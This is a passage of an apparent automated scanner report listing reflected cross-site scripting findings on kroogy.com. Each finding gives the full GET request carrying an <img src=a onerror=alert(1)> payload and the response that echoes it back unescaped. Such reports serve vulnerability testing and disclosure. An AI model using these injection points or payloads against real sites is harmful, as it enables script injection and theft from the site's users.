Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Index11056<img src=a onerror=alert(1)>15604bb1f75Controller</strong>
...[SNIP]...

5.20. http://kroogy.com/index/livesearch&q=site:&type=web [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site:&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5be1c<img%20src%3da%20onerror%3dalert(1)>192451da902 was submitted in the REST URL parameter 2. This input was echoed as 5be1c<img src=a onerror=alert(1)>192451da902 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearch5be1c<img%20src%3da%20onerror%3dalert(1)>192451da902&q=site:&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearch5be1c<img src=a onerror=alert(1)>192451da902</strong>
...[SNIP]...

5.21. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_728_90_random.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38cc5<img%20src%3da%20onerror%3dalert(1)>2e38d3282c6 was submitted in the REST URL parameter 1. This input was echoed as 38cc5<img src=a onerror=alert(1)>2e38d3282c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pub38cc5<img%20src%3da%20onerror%3dalert(1)>2e38d3282c6/banner_728_90_random.php HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2126

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Pub38cc5<img src=a onerror=alert(1)>2e38d3282c6Controller</strong>
...[SNIP]...

5.22. http://kroogy.com/search/emailafriend [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/emailafriend

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e99b4<img%20src%3da%20onerror%3dalert(1)>8b9ef66b48e was submitted in the REST URL parameter 1. This input was echoed as e99b4<img src=a onerror=alert(1)>8b9ef66b48e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searche99b4<img%20src%3da%20onerror%3dalert(1)>8b9ef66b48e/emailafriend?url=http%3A%2F%2Fkroogy.com HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searche99b4<img src=a onerror=alert(1)>8b9ef66b48eController</strong>
...[SNIP]...

5.23. http://kroogy.com/search/emailafriend [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/emailafriend

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 582a0<img%20src%3da%20onerror%3dalert(1)>686409d57c8 was submitted in the REST URL parameter 2. This input was echoed as 582a0<img src=a onerror=alert(1)>686409d57c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/emailafriend582a0<img%20src%3da%20onerror%3dalert(1)>686409d57c8?url=http%3A%2F%2Fkroogy.com HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:42:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2126

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>emailafriend582a0<img src=a onerror=alert(1)>686409d57c8</strong>
...[SNIP]...

5.24. http://kroogy.com/search/images/blank.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/images/blank.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d06fa<img%20src%3da%20onerror%3dalert(1)>81d5887b4c4 was submitted in the REST URL parameter 2. This input was echoed as d06fa<img src=a onerror=alert(1)>81d5887b4c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/imagesd06fa<img%20src%3da%20onerror%3dalert(1)>81d5887b4c4/blank.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:44:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2120

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>imagesd06fa<img src=a onerror=alert(1)>81d5887b4c4</strong>
...[SNIP]...

5.25. http://kroogy.com/search/index.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/index.php

Issue detail

The value of the page request parameter is copied into the HTML document as plain text between tags. The payload 8db35<img%20src%3da%20onerror%3dalert(1)>223a12c50e6 was submitted in the page parameter. This input was echoed as 8db35<img src=a onerror=alert(1)>223a12c50e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/index.php?page=search/redir8db35<img%20src%3da%20onerror%3dalert(1)>223a12c50e6&type=news&search=site:xss.cx HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:37:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2119

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>redir8db35<img src=a onerror=alert(1)>223a12c50e6</strong>
...[SNIP]...

5.26. http://kroogy.com/search/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/news

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bef17<img%20src%3da%20onerror%3dalert(1)>1a3c051fc03 was submitted in the REST URL parameter 1. This input was echoed as bef17<img src=a onerror=alert(1)>1a3c051fc03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchbef17<img%20src%3da%20onerror%3dalert(1)>1a3c051fc03/news?search=site%3Axss.cx&type=news&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:42:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchbef17<img src=a onerror=alert(1)>1a3c051fc03Controller</strong>
...[SNIP]...

5.27. http://kroogy.com/search/news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/news

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4d34d<img%20src%3da%20onerror%3dalert(1)>c809307336 was submitted in the REST URL parameter 2. This input was echoed as 4d34d<img src=a onerror=alert(1)>c809307336 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/news4d34d<img%20src%3da%20onerror%3dalert(1)>c809307336?search=site%3Axss.cx&type=news&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:43:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2117

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>news4d34d<img src=a onerror=alert(1)>c809307336</strong>
...[SNIP]...

5.28. http://kroogy.com/search/noresults [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/noresults

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b56e<img%20src%3da%20onerror%3dalert(1)>023dea34fef was submitted in the REST URL parameter 1. This input was echoed as 7b56e<img src=a onerror=alert(1)>023dea34fef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search7b56e<img%20src%3da%20onerror%3dalert(1)>023dea34fef/noresults?search=site:xss.cx&type=news HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search7b56e<img src=a onerror=alert(1)>023dea34fefController</strong>
...[SNIP]...

5.29. http://kroogy.com/search/noresults [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/noresults

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf205<img%20src%3da%20onerror%3dalert(1)>b24b05ec673 was submitted in the REST URL parameter 2. This input was echoed as bf205<img src=a onerror=alert(1)>b24b05ec673 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/noresultsbf205<img%20src%3da%20onerror%3dalert(1)>b24b05ec673?search=site:xss.cx&type=news HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2123

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>noresultsbf205<img src=a onerror=alert(1)>b24b05ec673</strong>
...[SNIP]...

5.30. http://kroogy.com/search/random.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/random.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 898ad<img%20src%3da%20onerror%3dalert(1)>372477569b5 was submitted in the REST URL parameter 1. This input was echoed as 898ad<img src=a onerror=alert(1)>372477569b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search898ad<img%20src%3da%20onerror%3dalert(1)>372477569b5/random.php HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/emailafriend?url=http%3A%2F%2Fkroogy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.6.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:40:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search898ad<img src=a onerror=alert(1)>372477569b5Controller</strong>
...[SNIP]...

5.31. http://kroogy.com/search/random.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/random.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be755<img%20src%3da%20onerror%3dalert(1)>f0101f7e97 was submitted in the REST URL parameter 2. This input was echoed as be755<img src=a onerror=alert(1)>f0101f7e97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/random.phpbe755<img%20src%3da%20onerror%3dalert(1)>f0101f7e97 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/emailafriend?url=http%3A%2F%2Fkroogy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.6.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2123

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>random.phpbe755<img src=a onerror=alert(1)>f0101f7e97</strong>
...[SNIP]...

5.32. http://kroogy.com/search/redir [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/redir

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47c60<img%20src%3da%20onerror%3dalert(1)>af2c51e84c03eaa87 was submitted in the REST URL parameter 1. This input was echoed as 47c60<img src=a onerror=alert(1)>af2c51e84c03eaa87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /search47c60<img%20src%3da%20onerror%3dalert(1)>af2c51e84c03eaa87/redir?type=web&search=site%3axss.cx HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
Cache-Control: max-age=0
Origin: http://kroogy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:35:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2135

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search47c60<img src=a onerror=alert(1)>af2c51e84c03eaa87Controller</strong>
...[SNIP]...

5.33. http://kroogy.com/search/redir [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/redir

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24b8a<img%20src%3da%20onerror%3dalert(1)>a30ab8d9c04aed8ef was submitted in the REST URL parameter 2. This input was echoed as 24b8a<img src=a onerror=alert(1)>a30ab8d9c04aed8ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /search/redir24b8a<img%20src%3da%20onerror%3dalert(1)>a30ab8d9c04aed8ef?type=web&search=site%3axss.cx HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
Cache-Control: max-age=0
Origin: http://kroogy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:35:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2125

<html>
